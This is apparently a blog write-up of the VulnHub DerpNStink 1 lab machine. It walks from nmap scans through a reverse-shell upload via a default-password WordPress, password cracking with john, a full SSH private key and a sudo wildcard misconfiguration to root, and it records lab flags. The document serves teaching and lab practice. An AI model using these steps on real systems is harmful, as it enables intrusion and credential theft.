DerpNStink One – Writeup

Details

This machine is https://www.vulnhub.com/entry/derpnstink-1,221/

Recon Phase

To start I carried out a host discovery scan

root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00030s latency).
MAC Address: 0A:00:27:00:00:16 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00033s latency).
MAC Address: 08:00:27:73:A7:33 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up (0.0064s latency).
MAC Address: 08:00:27:F2:FC:A8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.20 seconds

As my target was on 192.168.56.101 I carried out a service discovery scan

root@kali:~# nmap -sV 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.0035s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:F2:FC:A8 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.49 seconds

I then ran some nmap scripts against the target

root@kali:~# nmap -sC 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.0011s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
| ssh-hostkey:
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-title: DeRPnStiNK
MAC Address: 08:00:27:F2:FC:A8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds

Gaining A Shell

To start I went to check what was on the web server by navigating to http://192.168.56.101 in browser

Screenshot 1

And within the source I found the first flag

Screenshot 2

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

With no leads on where to look next I setup dirbuster

Screenshot 3

Screenshot 4

First I checked out the /webnotes directory

Screenshot 5

This looked like a text file containing some shell logs for a whois command, I decided to see what the note in the directory was at /webnotes/info.txt

Screenshot 6

From this I realised I would need to add derpnstink.local as 192.168.56.101 to my hosts file at some point. But first I went to /temporary

Screenshot 7

The next directory I checked was http://192.168.56.101/weblog/ which redirected to http://derpnstink.local/weblog/. So I needed to setup the hosts file

root@kali:~# echo 192.168.56.101 derpnstink.local | tee -a /etc/hosts

Now I could access the web blog, which turned out to be a wordpress install

Screenshot 8

Within the source I found the slideshow was linking to some .php files

Screenshot 9

http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/uoukbgmr.php

When trying to access them, I found shell.php and uoukbgmr.php gave 404s. But elidumfy.php did not and instead displayed the beginning of a comment

Screenshot 10

Through further digging, I found an active install of phpmyadmin at http://192.168.56.101/php/phpmyadmin/, although as I had no creds this wasn't helpful yet. I instead began to dig further into the blog, locating the login page at http://derpnstink.local/weblog/wp-login.php

Screenshot 11

I tried the standard Admin:admin login which let me in

Screenshot 12

Knowing the slideshow had previously had php uploaded to it, I headed over to its management console to see if I could upload my own php

Screenshot 13

I added a new slide, uploading a copy of /usr/share/webshells/php/php-reverse-shell.php where I had added my own ip and port

Screenshot 14

Once it was uploaded, I needed a listener to receive the shell

root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...

By clicking on the link to the image I was able to trigger the shell to activate

connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 46380
Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
 13:59:08 up  1:28,  0 users,  load average: 0.00, 0.46, 1.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Priv Esc

Now I had a shell I used to normal python trick to spawn a tty shell

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@DeRPnStiNK:/$

The first thing I wanted was the user list

www-data@DeRPnStiNK:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
stinky:x:1001:1001:Uncle Stinky,,,:/home/stinky:/bin/bash
ftp:x:118:126:ftp daemon,,,:/srv/ftp:/bin/false
mrderp:x:1000:1000:Mr. Derp,,,:/home/mrderp:/bin/bash

From here I wanted to check out the users home directories

www-data@DeRPnStiNK:/$ cd /home
www-data@DeRPnStiNK:/home$ ls -la
drwxr-xr-x  4 root   root   4096 Nov 12  2017 .
drwxr-xr-x 23 root   root   4096 Nov 12  2017 ..
drwx------ 10 mrderp mrderp 4096 Jan  9  2018 mrderp
drwx------ 12 stinky stinky 4096 Jan  9  2018 stinky

As I could not access them, I decided to dig into the web directories

www-data@DeRPnStiNK:/home$ cd /var/www/html
www-data@DeRPnStiNK:/var/www/html$ ls -la
drwxr-xr-x 8 nobody   nogroup   4096 Nov 12  2017 .
drwxr-xr-x 3 root     root      4096 Nov 11  2017 ..
-rw-r--r-- 1 root     root        18 Nov 12  2017 .htaccess
drwxr-xr-x 2 root     root      4096 Nov 11  2017 css
-rw-r--r-- 1 root     root    108987 Nov 11  2017 derp.png
-rw-r--r-- 1 root     root      1298 Nov 12  2017 index.html
drwxr-xr-x 2 root     root      4096 Nov 11  2017 js
drwxr-xr-x 2 root     root      4096 Nov 11  2017 php
-rw-r--r-- 1 root     root        53 Nov 11  2017 robots.txt
-rw-r--r-- 1 root     root    222045 Nov 11  2017 stinky.png
drwxrwxrwx 2 root     root      4096 Nov 12  2017 temporary
drwxr-xr-x 5 www-data root      4096 Dec 12  2017 weblog
drwxr-xr-x 2 root     root      4096 Jan  9  2018 webnotes

Not noticing anything new, I extracted the database user information from the wp-config.php file

www-data@DeRPnStiNK:/var/www/html$ cd weblog
www-data@DeRPnStiNK:/var/www/html/weblog$ ls -la
drwxr-xr-x  5 www-data root     4096 Dec 12  2017 .
drwxr-xr-x  8 nobody   nogroup  4096 Nov 12  2017 ..
-rw-r--r--  1 www-data nogroup   418 Sep 24  2013 index.php
-rw-r--r--  1 www-data nogroup 19935 Dec 12  2017 license.txt
-rw-r--r--  1 www-data nogroup  7322 Dec 12  2017 readme.html
-rw-r--r--  1 www-data nogroup  5456 May 24  2016 wp-activate.php
drwxr-xr-x  9 www-data nogroup  4096 Aug 16  2016 wp-admin
-rw-r--r--  1 www-data nogroup   364 Dec 19  2015 wp-blog-header.php
-rw-r--r--  1 www-data nogroup  1477 May 23  2016 wp-comments-post.php
-rw-r--r--  1 www-data nogroup  2853 Dec 16  2015 wp-config-sample.php
-rw-r--r--  1 www-data root     3123 Nov 11  2017 wp-config.php
drwxr-xr-x  6 www-data nogroup  4096 Nov 12  2017 wp-content
-rw-r--r--  1 www-data nogroup  3286 May 24  2015 wp-cron.php
drwxr-xr-x 17 www-data nogroup 12288 Aug 16  2016 wp-includes
-rw-r--r--  1 www-data nogroup  2382 May 23  2016 wp-links-opml.php
-rw-r--r--  1 www-data nogroup  3353 Apr 14  2016 wp-load.php
-rw-r--r--  1 www-data nogroup 34057 Jun 14  2016 wp-login.php
-rw-r--r--  1 www-data nogroup  7993 Dec 12  2017 wp-mail.php
-rw-r--r--  1 www-data nogroup 13920 Aug 13  2016 wp-settings.php
-rw-r--r--  1 www-data nogroup 29890 May 24  2016 wp-signup.php
-rw-r--r--  1 www-data nogroup  4035 Nov 30  2014 wp-trackback.php
-rw-r--r--  1 www-data nogroup  3064 Jul  6  2016 xmlrpc.php
www-data@DeRPnStiNK:/var/www/html/weblog$ cat wp-config.php
[SNIP]
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'mysql');
[SNIP]

With credentials for the mysql root user of root:mysql I headed over to the phpmyadmin instance on http://derpnstink.local/php/phpmyadmin/ and used the creds to login

Screenshot 15

Screenshot 16

My plan was to take logins from the wordpress database and test them against other services

Screenshot 17

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

The username here did not match any users seen on the server, but there was a close match called "stinky". So, I saved the hash in a file called crack.txt and setup john to crack it

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass crack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
wedgie57         (unclestinky)
1g 0:00:07:17 DONE (2018-07-11 22:20) 0.002287g/s 6396p/s 6396c/s 6396C/s wedgieboard..wedge8
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I now had some creds of unclestinky:wedgie57 although I knew the username on the server was stinky, so I tried to login with ssh

root@kali:~# ssh stinky@192.168.56.101
                       ,~~~~~~~~~~~~~..
                       '  Derrrrrp  N  `
        ,~~~~~~,       |    Stink      |
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)
    (*)  ; (^)(^)':
        =;  ____  ;
          ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -`.   ,'
                -
            `--'
stinky@192.168.56.101: Permission denied (publickey).

It turned out stinky was limited to access via ssh keys, so I instead tried to login to ftp

root@kali:~# ftp 192.168.56.101
Connected to 192.168.56.101.
220 (vsFTPd 3.0.2)
Name (192.168.56.101:root): stinky
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Now I was into ftp I began to dig around

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 ..
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls -la
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2017 ..
drwxr-xr-x    2 1001     1001         4096 Nov 12  2017 network-logs
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ssh
-rwxr-xr-x    1 0        0              17 Nov 12  2017 test.txt
drwxr-xr-x    2 0        0            4096 Nov 12  2017 tmp
226 Directory send OK.

My plan was to search each directory and download and files I found, starting with test.txt

ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (17 bytes).
226 Transfer complete.
17 bytes received in 0.01 secs (3.2374 kB/s)
ftp> cd ssh
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 .
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 ..
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ssh
226 Directory send OK.

Now I found this was multiple layers of "ssh" folders, I navigated through them until I reached the last one

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Nov 13  2017 .
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ..
-rwxr-xr-x    1 0        0            1675 Nov 13  2017 key.txt
226 Directory send OK.
ftp> get key.txt
local: key.txt remote: key.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for key.txt (1675 bytes).
226 Transfer complete.
1675 bytes received in 0.01 secs (268.7713 kB/s)

Finally I went to the network-logs folder at the top level

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Nov 12  2017 .
drwxr-xr-x    5 1001     1001         4096 Nov 12  2017 ..
-rwxr-xr-x    1 0        0             719 Nov 12  2017 derpissues.txt
226 Directory send OK.
ftp> get derpissues.txt
local: derpissues.txt remote: derpissues.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for derpissues.txt (719 bytes).
226 Transfer complete.
719 bytes received in 0.00 secs (161.8599 kB/s)

With 3 new files I inspected them

root@kali:~# cat test.txt
vsftpd test file
root@kali:~# cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay

This was interesting but didn't help yet as I hadn't seen any packet captures. I had one file left to check

root@kali:~# cat key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----

As I had what seemed to be an ssh private key I had to chmod the file to work with ssh

root@kali:~# chmod 600 key.txt

Then used it to connect, attempting to access the stinky account

root@kali:~# ssh stinky@192.168.56.101 -i key.txt
stinky@DeRPnStiNK:~$

I attempted to see what I could do

stinky@DeRPnStiNK:~$ sudo -l
[sudo] password for stinky:

Without a password for the account I could not sudo. but I could now access the home directory for stinky

stinky@DeRPnStiNK:~$ ls -la
drwx------ 12 stinky stinky  4096 Jan  9  2018 .
drwxr-xr-x  4 root   root    4096 Nov 12  2017 ..
-rwx------  1 stinky stinky   220 Nov 12  2017 .bash_logout
-rwx------  1 stinky stinky  3637 Nov 12  2017 .bashrc
drwx------  7 stinky stinky  4096 Nov 13  2017 .cache
drwx------  3 stinky stinky  4096 Nov 13  2017 .compiz
drwx------ 13 stinky stinky  4096 Nov 13  2017 .config
drwxr-xr-x  2 stinky stinky  4096 Nov 13  2017 Desktop
-rw-r--r--  1 stinky stinky    25 Nov 13  2017 .dmrc
drwxr-xr-x  2 stinky stinky  4096 Nov 13  2017 Documents
drwxr-xr-x  2 stinky stinky  4096 Nov 13  2017 Downloads
drwxr-xr-x  3 nobody nogroup 4096 Nov 12  2017 ftp
drwx------  3 stinky stinky  4096 Nov 13  2017 .gconf
-rw-------  1 stinky stinky   334 Nov 13  2017 .ICEauthority
drwx------  3 stinky stinky  4096 Nov 13  2017 .local
-rwx------  1 stinky stinky   675 Nov 12  2017 .profile
drwxr-xr-x  2 stinky stinky  4096 Nov 12  2017 .ssh
-rw-------  1 stinky stinky    55 Nov 13  2017 .Xauthority
-rw-------  1 stinky stinky  1463 Nov 13  2017 .xsession-errors

With nothing obvious in the directory, I began to look in the sub directories

stinky@DeRPnStiNK:~$ cd Desktop
stinky@DeRPnStiNK:~/Desktop$ ls -ls
-rwxr-xr-x 1 stinky stinky 72 Nov 12  2017 flag.txt
stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

Now at this point I realised I had somehow missed flag 2. (I did later go back and get it, see the end of this writeup) Although as I was making progress, I continued with my digging

stinky@DeRPnStiNK:~$ cd Documents/
stinky@DeRPnStiNK:~/Documents$ ls -la
drwxr-xr-x  2 stinky stinky    4096 Nov 13  2017 .
drwx------ 12 stinky stinky    4096 Jan  9  2018 ..
-rw-r--r--  1 root   root   4391468 Nov 13  2017 derpissues.pcap

As I now had a pcap, with a similar name to the txt file found on the ftp server. I realised it may have the password used by mrderp when logging into the wordpress site, which could well be the password for the mrderp account on the server, so I needed to exfil the pcap for inspection

root@kali:~# scp -i key.txt stinky@192.168.56.101:~/Documents/derpissues.pcap .
Ubuntu 14.04.5 LTS
                       ,~~~~~~~~~~~~~..
                       '  Derrrrrp  N  `
        ,~~~~~~,       |    Stink      |
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)
    (*)  ; (^)(^)':
        =;  ____  ;
          ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -`.   ,'
                -
            `--'
derpissues.pcap                                                                  100% 4289KB 810.0KB/s   00:05

I took this and inspected it with wireshark. To find what I was looking for I went to "Edit -> Find Packet", I then changed the settings to "Packet Details" and "String" before searching for "mrderp"

Screenshot 18

This found me the password "derpderpderpderpderpderpderp" which meant I had creds of mrderp:derpderpderpderpderpderpderp. I then tried this on ssh

root@kali:~# ssh mrderp@192.168.56.101
mrderp@DeRPnStiNK:~$

Now I had another account, this time with a password, I tried to see what it could do

mrderp@DeRPnStiNK:~$ sudo -l
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*

So I can run a program as sudo from the directory, I first had to find it

mrderp@DeRPnStiNK:~$ ls -la
drwx------ 10 mrderp mrderp 4096 Jan  9  2018 .
drwxr-xr-x  4 root   root   4096 Nov 12  2017 ..
-rw-r--r--  1 mrderp mrderp  220 Nov 12  2017 .bash_logout
-rw-r--r--  1 mrderp mrderp 3637 Nov 12  2017 .bashrc
drwx------  8 mrderp mrderp 4096 Nov 13  2017 .cache
drwx------ 14 mrderp mrderp 4096 Nov 13  2017 .config
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Desktop
-rw-r--r--  1 mrderp mrderp   25 Nov 13  2017 .dmrc
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Documents
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Downloads
drwx------  3 mrderp mrderp 4096 Nov 13  2017 .gconf
-rw-------  1 mrderp mrderp  334 Nov 13  2017 .ICEauthority
drwx------  3 mrderp mrderp 4096 Nov 13  2017 .local
-rw-r--r--  1 mrderp mrderp  675 Nov 12  2017 .profile
drwx------  2 mrderp mrderp 4096 Nov 12  2017 .ssh
-rw-------  1 mrderp mrderp   55 Nov 13  2017 .Xauthority
-rw-------  1 mrderp mrderp  831 Nov 13  2017 .xsession-errors

As the folder did not exist, and the sudo referenced a file in a directory I could write to. As such I could make any executable I wanted and run it using sudo. To start I needed to make the directory

mrderp@DeRPnStiNK:~$ mkdir binaries

I then made the derpy executable, I decided to use a shell file which executed a shell

mrderp@DeRPnStiNK:~/binaries$ vi derpy

Inside the file I put

#!/bin/bash
/bin/sh

Once the file was created I had to chmod it to be executable before executing it

mrderp@DeRPnStiNK:~/binaries$ chmod +x ./derpy
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy
#

I now had a shell

# whoami
root

Now I had a root shell I just needed to get the flag

# cd /root
# ls -la
drwx------ 14 root root 4096 Jan  9  2018 .
drwxr-xr-x 23 root root 4096 Nov 12  2017 ..
-rw-------  1 root root 1391 Jan  9  2018 .bash_history
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
drwx------ 10 root root 4096 Nov 12  2017 .cache
drwx------  3 root root 4096 Nov 13  2017 .compiz
drwxr-xr-x 15 root root 4096 Nov 12  2017 .config
drwx------  3 root root 4096 Nov 12  2017 .dbus
drwxr-xr-x  2 root root 4096 Nov 13  2017 Desktop
-rw-r--r--  1 root root   25 Nov 12  2017 .dmrc
drwxr-xr-x  2 root root 4096 Nov 12  2017 Documents
drwxr-xr-x  2 root root 4096 Nov 12  2017 Downloads
drwx------  3 root root 4096 Jan  9  2018 .gconf
drwx------  2 root root 4096 Nov 12  2017 .gvfs
-rw-------  1 root root 2338 Jan  9  2018 .ICEauthority
drwxr-xr-x  3 root root 4096 Nov 12  2017 .local
drwx------  4 root root 4096 Nov 12  2017 .mozilla
-rw-------  1 root root  181 Nov 11  2017 .mysql_history
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
drwx------  2 root root 4096 Nov 11  2017 .ssh
-rw-------  1 root root   55 Jan  9  2018 .Xauthority
-rw-------  1 root root 1431 Jan  9  2018 .xsession-errors
-rw-------  1 root root 1431 Jan  9  2018 .xsession-errors.old
# cd Desktop
# ls -la
drwxr-xr-x  2 root root 4096 Nov 13  2017 .
drwx------ 14 root root 4096 Jan  9  2018 ..
-rw-r--r--  1 root root  180 Jan  9  2018 flag.txt
# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo

And the machine was rooted, normally this is where I finish up, but I was missing a flag

The Case Of The Missing Flag

I eventually found the flag in wordpress, I had overlooked it as I already had code execution and a shell which is normally what I can do using wordpress access. But it turned out when I logged into wordpress with the cracked credentials of

unclestinky:wedgie57

Then the menus which had previously been hidden on the admin dashboard became visible

Screenshot 19

Within the draft post I found the missing flag

Screenshot 20

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

And with the missing flag collected. This machine was completed

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.